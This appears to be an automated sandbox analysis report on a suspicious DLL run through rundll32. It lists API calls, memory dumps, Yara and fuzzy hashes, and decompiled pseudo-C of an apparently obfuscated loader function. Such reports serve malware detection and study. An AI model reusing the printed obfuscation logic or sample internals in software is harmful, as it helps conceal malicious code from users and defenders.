Function 6E216102, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E230EA8,00000000,00000000,008B018B,6E20DA1E,?,00000004,00000001,6E230EA8,0000007F,?,008B018B,00000001), ref: 6E21614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2161D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2161EA
__freea.LIBCMT ref: 6E2161F3

Part of subcall function 6E20F26D: RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 1cf2933141ac65797c618ef13fe5a617bfd6d119ae5ffda5e40d4882da944d8f
Instruction ID: 313a0dff0af59cffe074e0cbc09540bf81cb6fb413a2bcaa9bbd01627d439ec2
Opcode Fuzzy Hash: 1cf2933141ac65797c618ef13fe5a617bfd6d119ae5ffda5e40d4882da944d8f
Instruction Fuzzy Hash: 5D31CD72A1021BAFDF14CFA4CC84DEF3BAAEB40714F084568ED14D6251EB35CA95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E213E7F, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E213E26,?,00000000,00000000,00000000,?,6E2141BD,00000006,FlsSetValue), ref: 6E213EB1
GetLastError.KERNEL32(?,6E213E26,?,00000000,00000000,00000000,?,6E2141BD,00000006,FlsSetValue,6E231C58,FlsSetValue,00000000,00000364,?,6E20D6D1), ref: 6E213EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E213E26,?,00000000,00000000,00000000,?,6E2141BD,00000006,FlsSetValue,6E231C58,FlsSetValue,00000000), ref: 6E213ECB

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 437c17e0f59cbf3e74be3753f95f61e08cae6bf20981328e54affb5b95798733
Instruction ID: 5e8c07c179483aad5171b3e6edcb8e5f2ac0097f718acaa34ae9884cbdbf6595
Opcode Fuzzy Hash: 437c17e0f59cbf3e74be3753f95f61e08cae6bf20981328e54affb5b95798733
Instruction Fuzzy Hash: AA01B53226D72B9FCB2149A98C4D98677DBBF167B1B160520EA05D3540D721D900CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D14EC, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1D14F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1D1528

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

numpunct.LIBCPMT ref: 6E1D1539

Part of subcall function 6E1D0110: __EH_prolog3.LIBCMT ref: 6E1D0117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1D154A

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 302862aef111e6830de21ed7053d89e782258e7b5467f29b84e3860a66cb648d
Instruction ID: 53d331131ba17ee63f7f5e838253dba2ed86069bce952739994989efe6e1f952
Opcode Fuzzy Hash: 302862aef111e6830de21ed7053d89e782258e7b5467f29b84e3860a66cb648d
Instruction Fuzzy Hash: 9E0181B5B4021A9FDB01CBECC850AEEBB79AF14794F20051AE515AB280DF748AC9D791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1558, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1D155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1D1594

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

numpunct.LIBCPMT ref: 6E1D15A5

Part of subcall function 6E1D0143: __EH_prolog3.LIBCMT ref: 6E1D014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1D15B6

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 67f47b096e9c3505b58e5c62f42433fb6329ff129c7ef3350414e7fd93a89ae5
Instruction ID: 4184fddacc040caa6f9e993d9ac516402ecf26ecb0239aff4cf00e30c4eba92e
Opcode Fuzzy Hash: 67f47b096e9c3505b58e5c62f42433fb6329ff129c7ef3350414e7fd93a89ae5
Instruction Fuzzy Hash: FD01F9B5A0021ADFCB00CFE8C950BEE7B78AF14790F200519E515AB280CFB48AC9DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DC229, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1DC230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1DC265

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

numpunct.LIBCPMT ref: 6E1DC276

Part of subcall function 6E1DBD9F: __EH_prolog3.LIBCMT ref: 6E1DBDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1DC287

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 0f7dbf55bffef1300e8c328537d1837a18e483e414a4eff3f596866370d8a150
Instruction ID: aadacd92615c85e6bbd36b7eec3b2774e3f06af080135d88ad3838fc8ed11430
Opcode Fuzzy Hash: 0f7dbf55bffef1300e8c328537d1837a18e483e414a4eff3f596866370d8a150
Instruction Fuzzy Hash: 5101A475A0021ADFDF40DFE8C850BEEBB79AF54794F20091AE515AB280CF744AC9D790

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CB968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E1CB96F

Part of subcall function 6E1CA2F1: __EH_prolog3.LIBCMT ref: 6E1CA2F8
Part of subcall function 6E1CA2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA302
Part of subcall function 6E1CA2F1: int.LIBCPMT ref: 6E1CA319
Part of subcall function 6E1CA2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA373

_Find_unchecked1.LIBCPMT ref: 6E1CBB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6E1CB9D7

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: 28c6ced91592e05667d3cab04ca0171ba7a2a3a998846dc8d07a122e665012bf
Instruction ID: 803cfd694f67ef58b20ffc7911cc71338604d9d4723fbeec1d6103b687c5b55e
Opcode Fuzzy Hash: 28c6ced91592e05667d3cab04ca0171ba7a2a3a998846dc8d07a122e665012bf
Instruction Fuzzy Hash: C3C19130E042888EDF11CBE4C490BECBB76AF35B04F645859D495EB24ECB7899C5EB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E2060ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E20617D

Strings

pow, xrefs: 6E206155, 6E206172

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c683df2aca92b342ffb4dbbe92653e6ac082a28f7be494f92079c2ce96a8c05b
Instruction ID: f3613378f1900d2b91a3137b18dde044b61d42383b3e9c695cae3ce6ff11752c
Opcode Fuzzy Hash: c683df2aca92b342ffb4dbbe92653e6ac082a28f7be494f92079c2ce96a8c05b
Instruction Fuzzy Hash: 0651AF6193C20F8BDB4166D4C9903DA77E7EB83702F304D58E191427DDEB3185C5DA92

Uniqueness

Uniqueness Score: -1.00%

Function 6E21DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E21DE50,?,00000050,?,?,?,?,?), ref: 6E21DC8A

Strings

ACP, xrefs: 6E21DBCD
OCP, xrefs: 6E21DC03

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: c84d1527493b51f6569ece9e767e8a1da9986feae1579f2e871e0b4c58f2ff79
Instruction ID: 9f17a92a16cda4825a0bcc254d2ae07db7a6c7eda77fa65fc14e89dd83e6a013
Opcode Fuzzy Hash: c84d1527493b51f6569ece9e767e8a1da9986feae1579f2e871e0b4c58f2ff79
Instruction Fuzzy Hash: AB21A366A5C10EE7D3548ED9C940BC763EBAB44B57F528C24EB0AD7208E762DB418A90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DFAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

`n(n, xrefs: 6E1DFB65
Tn(n, xrefs: 6E1DFB44

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Tn(n$`n(n
API String ID: 0-2013517204
Opcode ID: a67b70733c7e2a9c387ae21831bc05a5e735ed5de6b4c4dfebe7aa221ac9da4f
Instruction ID: a743afd1c265a9cfc6ca234d763fe1ddabe393680eee35139bf46a47973bf8e6
Opcode Fuzzy Hash: a67b70733c7e2a9c387ae21831bc05a5e735ed5de6b4c4dfebe7aa221ac9da4f
Instruction Fuzzy Hash: 9011E732C20A199BCF40CEE8C8547CF77E6AB1A324F254155DC30EB281D6B0C6899BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C3751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E1C3758
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C37E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6E1C37BA

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: 11be0a444a37f25cb8843a9a3e20c4937936be3d1ff3ff4755da340489256877
Instruction ID: 7994b61858e4c82c4b8ab1f20c9c6cd6458cc7842447dffe1bd79a77a21730aa
Opcode Fuzzy Hash: 11be0a444a37f25cb8843a9a3e20c4937936be3d1ff3ff4755da340489256877
Instruction Fuzzy Hash: 4E018BB1848704AFD302DBE4C4487ECB2E8AF37B16F21499AD180D2140EB7C0AC6EB53

Uniqueness

Uniqueness Score: -1.00%

Function 6E214B79, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,07B3393E,07B3393E,00000000,00000000,00000000,00000000,00000000), ref: 6E214C0F
GetLastError.KERNEL32 ref: 6E214C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E214C78

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b831570c26da9ca51d630a9a3157c34ea6dbe8a4de720837e15dfbd2bb11556b
Instruction ID: d4606820ad02b41b021931bd56f407ae649bb116670555c9f97a652c2e010253
Opcode Fuzzy Hash: b831570c26da9ca51d630a9a3157c34ea6dbe8a4de720837e15dfbd2bb11556b
Instruction Fuzzy Hash: 2E41F97560820FAFDB118FE5C844BEA7BFBEF41329F104159EA5DA7190D7328A02C7A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4872 Parent PID: 5300 rundll32.exeCOMMON

Executed Functions

Function 6E1C1285, Relevance: 44.3, APIs: 3, Strings: 22, Instructions: 597
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1C1285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6E1E00AC(0x6e227e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6e285a90; // 0x896cd2f8
				_t127 =  *0x6e2859d0; // 0x90eff98a
				_t261 =  *0x6e2859d8; // 0x8810b8d4
				_t380 =  *0x6e2859dc; // 0x6
				_t358 =  *0x6e285a00; // 0x776e8cd0
				_t405 = 0 - _t380;
				_t327 =  *0x6e285a90; // 0x896cd2f8
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6e285a58 =  *0x6e285a58 + 0xfffffd1c;
					 *0x6e285a00 = _t358;
					asm("adc dword [0x6e285a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6e2859d8 = _t261;
					asm("adc esi, eax");
					 *0x6e2859dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6e2859e6 & 0x0000ffff;
				_t131 = 0x6e2859e6;
				 *(_t400 - 0x2c) = 0x6e2859e6;
				 *(_t400 - 0x1c) = 0x6e2859e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6E1E01E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6e2859d8 = _t261;
						 *0x6e2859dc = _t380;
						 *0x6e285a90 = _t327;
						if(_t327 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6e285a44);
				_t135 = 6;
				_t411 =  *0x6e285a98 - _t135; // 0x6e22e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6e2859d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6e2859dc = _t380;
				} else {
					_t412 =  *0x6e285a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6e2859d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6e285a00; // 0x776e8cd0
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6e2859e6;
				 *0x6e285a90 = _t139 -  *0x6e285a90 +  *0x6e2859d0;
				_t142 =  *0x6e2859e6 & 0x0000ffff;
				 *0x6e2859d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6e2859dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6E1E01E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6e2859d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6e2859dc = _t256;
						 *0x6e285a90 = _t381;
						if(_t381 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t381 =  *0x6e285a00; // 0x776e8cd0
							_t142 =  *0x6e2859e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6e285a44);
				 *0x6e2859d0 = E6E1C0D32();
				GetTempPathA(0x56d, "C:\Users\hardz\AppData\Local\Temp\");
				_t417 =  *0x6e285a04 - 0x1b47; // 0x90
				if(_t417 == 0) {
					_t318 =  *0x6e285a90; // 0x896cd2f8
					_t319 = _t318 + ( *0x6e2859e6 & 0x0000ffff);
					 *0x6e285a90 = _t319;
					_push(0);
					_t320 =  *0x6e2859d8; // 0x8810b8d4
					asm("adc [0x6e2859dc], eax");
					 *0x6e2859d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6E1C0D32();
				_t402 = _t401 - 0x10;
				 *0x6e2859d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6E1C5DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6E1C4197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E1C1E10(_t149);
				_t270 = 6;
				_t418 =  *0x6e285a02 - _t270; // 0x776e
				if(_t418 == 0) {
					_t151 =  *0x6e2859d8; // 0x8810b8d4
					_t153 = _t151 + 0x11dde +  *0x6e2859d0;
					__eflags = _t153;
					 *0x6e285a90 = _t153;
				} else {
					_t315 =  *0x6e2859d8; // 0x8810b8d4
					 *0x6e2859d0 =  *0x6e2859d0 +  ~_t315 -  *0x6e285a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6E20179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6e2859d0; // 0x90eff98a
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0x90eff652
				_t272 = _t25;
				 *0x6e285a90 = _t272;
				_t419 =  *0x6e285a02 - _t155; // 0x776e
				if(_t419 == 0) {
					_t331 =  *0x6e285a00; // 0x776e8cd0
					_t156 = 0;
					 *0x6e2859dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6e2859d8 = _t333;
				} else {
					_t333 =  *0x6e2859d8; // 0x8810b8d4
					_t156 =  *0x6e2859dc; // 0x6
					 *0x6e285a90 = _t272 - _t333 * 0x3d -  *0x6e285a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6E1C4401(_t260, E6E1C4401(_t260, E6E1C1FF2(_t260, E6E1C20D9(_t260, E6E1C4267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6e288150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6e285a00; // 0x776e8cd0
				_t277 = 0x6e285a0e;
				_t362 =  *0x6e2859dc; // 0x6
				_t383 =  *0x6e2859d8; // 0x8810b8d4
				do {
					if(_t336 != ( *0x6e2859e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0x776e8cd5
						_t245 = _t26 + _t383;
						 *0x6e285a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6e2859e2);
				_push("cd Matter m");
				 *0x6e2859d8 = _t383;
				 *0x6e2859dc = _t362; // executed
				E6E20179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6e285a98 - _t164; // 0x6e22e664
				if(_t422 != 0) {
					L34:
					 *0x6e2859d8 =  *0x6e2859d8 - 0x27 +  *0x6e2859d0 * 0x3d;
					asm("sbb [0x6e2859dc], ecx");
				} else {
					_t423 =  *0x6e285a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6e2859d8; // 0x8810b8d4
						 *0x6e2859d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6e285a90 =  *0x6e285a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6E1C4197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E1C1E10(_t169);
				_t281 = 0x27;
				_t171 = E6E1C0EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6e2859d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6e2859dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6E1C5DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6E1C4197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E1C1E10(_t174);
				_t176 =  *0x6e2859dc; // 0x6
				 *(_t400 - 0x18) =  *0x6e2859d8 * 0x36 +  *0x6e285a90;
